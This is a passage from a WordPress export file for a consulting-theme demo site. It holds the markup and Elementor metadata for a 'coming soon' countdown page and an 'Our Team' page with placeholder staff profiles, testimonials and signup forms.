		<ul data-zone="0" data-date="2020/10/22 12:00" data-day="Day" data-days="Days" data-hour="Hour" data-hours="Hours" data-min="Minute" data-mins="Minutes" data-second="Second" data-seconds="Seconds">
			<li>00<p>Days</p></li>
			<li>:</li>
			<li>00<p>Hours</p></li>
			<li>:</li>
			<li>00<p>Minutes</p></li>
			<li>:</li>
			<li>00<p>Seconds</p></li>
		</ul>
		<p>We are about to go live so watch this space!</p>		
<form action="/maxbizz-consulting/wp-admin/admin-ajax.php#wpcf7-f610-o1" method="post" novalidate="novalidate">
<input type="hidden" name="_wpcf7" value="610" />
<input type="hidden" name="_wpcf7_version" value="5.2.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f610-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><button>Sign Up</button>
</form>		
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>604</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"f1dbf06","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/coming-soon.jpg","id":607},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","height":"full","content_position":"middle","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"65f2915","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"adfe967","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"image_size":"full","image_custom_dimension":{"width":"80","height":"80"},"width":{"unit":"px","size":140,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"link_to":"custom","link":{"url":"http:\/\/wpdemo.archiwp.com\/theratio","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"image"},{"id":"32c523f","elType":"widget","settings":{"title":"Maxbizz is in the Works!","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":51,"sizes":[]},"typography_line_height":{"unit":"px","size":110,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":42,"sizes":[]},"typography_line_height_mobile":{"unit":"px","size":55,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"title_color":"#1A1A1A","typography_font_weight":"700"},"elements":[],"widgetType":"heading"},{"id":"df3cd75","elType":"widget","settings":{"day":"Day","hour":"Hour","min":"Minute","second":"Second","days":"Days","hours":"Hours","mins":"Minutes","seconds":"Seconds","_padding":{"unit":"px","top":"0","right":"0","bottom":"90","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"icountdown"},{"id":"2c42310","elType":"widget","settings":{"editor":"<p>We are about to go live so watch this space!<\/p>","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]},"text_color":"#555555","typography_font_family":"Inter"},"elements":[],"widgetType":"text-editor"},{"id":"5507345","elType":"widget","settings":{"cf7":"610","_padding":{"unit":"px","top":"0","right":"0","bottom":"115","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"},{"id":"880944e","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:22:"image_custom_dimension";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_line_height";i:1;s:27:"typography_font_size_mobile";i:1;s:29:"typography_line_height_mobile";i:1;s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:10:"icountdown";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:6:{s:5:"align";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;s:10:"text_color";i:1;s:22:"typography_font_family";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:2:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:1;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;}}s:6:"layout";a:1:{s:14:"section_layout";a:2:{s:6:"height";i:1;s:16:"content_position";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:37:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=690</guid>
		<description></description>
		<content:encoded><![CDATA[our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				chief communication officer			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team5.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team5-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Mary Flynn</h6>				CHIEF TECHNOLOGY OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team6.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team6-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Adam Oswald</h6>				CHIEF MARKETING OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team7.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team7.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team7-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Kate Green</h6>				CHIEF FINANCIAL OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team8.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team8.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team8-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Harry Septem</h6>				co-founder of company			
	        our benefits	        <h2>Entrust Your Project to  Our Specialists</h2>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
										<img width="959" height="650" src="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg 959w, https://maxbizz.s3.amazonaws.com/images/image1-team-300x203.jpg 300w, https://maxbizz.s3.amazonaws.com/images/image1-team-768x521.jpg 768w" sizes="(max-width: 959px) 100vw, 959px" />											
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
			<h4>Ready to Get Started?</h4>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-consulting/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>690</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:37:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:37:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[691]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"c0972f9","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"a497b47","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"851ebdc","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5cea06f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"3c8329c","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"d1c3196","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"e34f121","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"051be26","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"4dda4d5","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7893ae6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2bcb443","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c6f2cd2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3045fbb","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"05a209e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2585422","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"3f0bea3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"659956f","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"b1c7f19","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"419a6b1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"65aaf12","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team5.jpg","id":694},"member_name":"Mary Flynn","member_extra":"CHIEF TECHNOLOGY OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab 